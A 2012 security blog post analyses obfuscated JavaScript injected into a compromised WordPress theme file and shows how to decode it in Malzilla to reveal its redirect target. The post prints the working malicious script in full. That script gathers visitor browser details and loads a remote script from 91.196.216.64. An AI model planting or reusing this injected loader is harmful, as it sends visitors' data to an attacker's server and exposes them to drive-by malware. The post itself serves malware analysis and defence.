Blog for hpHosts, and whatever else I feel like writing about ....

Friday 20 April 2012

Exploit me baby one more time

Okay, so I couldn't come up with a decent title, but the content is nevertheless interesting, for those not already familiar with it anyway.

As usual, this only covers the basics needed to determine where it's going.

In short, my friend and fellow MDL admin, Holger, and I were sent a URL via the Malware Domain List contact form, letting us know the user had picked up a rather nasty trojan. You can already guess what the payload is, so I'm not going to cover that; instead, I'm only going to show you how to actually decode the code that's popped onto your site.

The code is usually placed in the .js files. Quite why is baffling, as it makes it easy to find, but what the heck, it saves me work. In this case:

hxxp://www.saucepan.org.uk/wp-content/themes/pans/scripts/unitpngfix.js

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;


To decode this, all you need to do is pop it into Malzilla's decoder window and modify it so it becomes:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
element=_0xdc8d[1];//(_0xdc8d[0]);


cls=_0xdc8d[2];
sw=_0xdc8d[3];
sh=_0xdc8d[4];
dc=_0xdc8d[5];
lc=_0xdc8d[6];
refurl=escape(_0xdc8d[7]);
ua=escape(_0xdc8d[8]);
var js=_0xdc8d[10];//(_0xdc8d[9]);
js=_0xdc8d[11]=_0xdc8d[0];
js=_0xdc8d[12]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;
var head=_0xdc8d[21];//(_0xdc8d[20])[0];
head=_0xdc8d[22]
document.write((js));


Click "Run Script", and voilà - you can see where it redirects the victim to. From here, you can follow it manually if you so wish (and remember - these things only allow access once per IP, so ensure you're recording everything if following it, or have a few extra IPs to hand).

You could clean up the code a bit to remove parts not required to decode it, but there's no point removing any more than necessary.

Oh and Google, this new editor is absolutely rubbish!

/edit

I meant to mention: those seeing this code should be familiar not only with the code, but with the IP this one redirects to - it was involved in the timthumb issue last year too:

http://www.stopthehacker.com/2011/12/08/rokbox-js-infections/

2 comments:

Conrad Longmore said...

Or.. you could just paste the URL into Wepawet and have it all done for you. Oh look, it's Spetsenergo and 91.196.216.64..

..this new Blogger interface definitely sucks though!

MysteryFCM said...

hehe yep, but that's too boring ;o) (figured I'd point out how to decode it manually, to save folk time, and try and get them used to identifying code they should be looking for at the same time).